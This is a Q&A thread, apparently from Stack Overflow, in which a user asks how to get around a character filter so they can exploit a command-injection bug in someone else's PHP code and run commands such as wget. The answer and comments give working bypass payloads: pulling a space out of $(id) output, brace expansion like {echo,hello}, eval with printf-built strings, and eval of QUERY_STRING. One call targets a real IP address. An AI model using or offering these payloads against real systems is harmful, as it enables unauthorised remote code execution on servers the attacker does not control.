# spaces,',`,/,\,<,>,?,&,| are filtered how to bypass them with Bash commands

Tags: bash

i have PHP code use some bash codes which the PHP code can run it, and its have a bug to make RCE in bash,

the command would be "$(id)" command executed as well

but if i execute any other command like "ls -la" its have a space 
the space replaced automatically with "-"

i checked the source as well and i found the following chars **spaces,',`,/,\,<,>,?,&,|** are filtered

how to bypass them and execute command like "wget link" and run it perfect

****UPDATE****

the following code i add as a live example.
send the command in sendcmd function

```
`https://pastebin.com/raw/1MfR6aic`
```

Comment: This is a better fit for [security.se] than StackOverflow. SO's scope is limited to practical questions about developing software -- exploiting a bug in someone else's program isn't the same thing.

Comment: @thatotherguy, ...the OP has a shell injection bug in someone else's PHP, but where strings are filtered in the manner described; they're trying to determine how to escalate that limited access to run arbitrary code. It's an interesting puzzle, but I don't at all believe in-scope here.

Comment: *Where* are the 'characters filtered'?

Comment: If HTTP headers are being exported to the environment, as is the case the case where PHP is being invoked via a CGI interface, that's an easy way to get arbitrary content into an expansion -- `eval "${QUERY_STRING}"` and there you are.

Comment: chars are filtered in PHP files side.

Comment: I updated the answer. See if it works.

Comment: Use `{eval,pwd,with,other,arguments}` to run `eval pwd with other arguments`

Answer (score 1):

This is (example) output from `id`

```
uid=1000(ibug) gid=1000(ibug)
```

Since these characters aren't filtered, you can get an unfiltered space like this:

```
ID=$(id)
echo${ID:14:1}foo
```

Now you have space. You can get virtually *any* character with `echo -e` and then `eval` an expression.

---

I tried your PHP code and found this working:

```
sendcmd("http://52.27.167.139", "{echo,hello}");
```

Just wrap then in braces and use commas. The shell will expand the brace to

```
echo hello
```

Comment: *Where* are the 'characters filtered'?

Comment: @user2864740, in 3rd-party, exploitably-buggy PHP not included in the question.

Comment: @user2864740 Read OP's question.

Comment: @iBug, not necessarily `echo -e` -- for that to not print `-e` on output the system needs to be running a non-POSIX shell, and your typical shell injection gets `/bin/sh`, where that's less likely than in an interactive instance. Safer to use `printf`.

Comment: @CharlesDuffy I've been using Bash all the time. But yeah, `printf` is another solution.

Comment: @iBug, *nod*. `echo -e` is the *only* place I'm aware of where bash is not just extended but noncompliant on black-letter mandated behavior out-of-the-box (though it stops supporting it, and becomes compliant, when both `posix` and `xpg_echo` runtime flags are set).

Comment: @user2444995, ...that's why you need to use the trick iBug shows in this answer. Don't pass the space on input, pull it from a variable you populated by running a command on the server.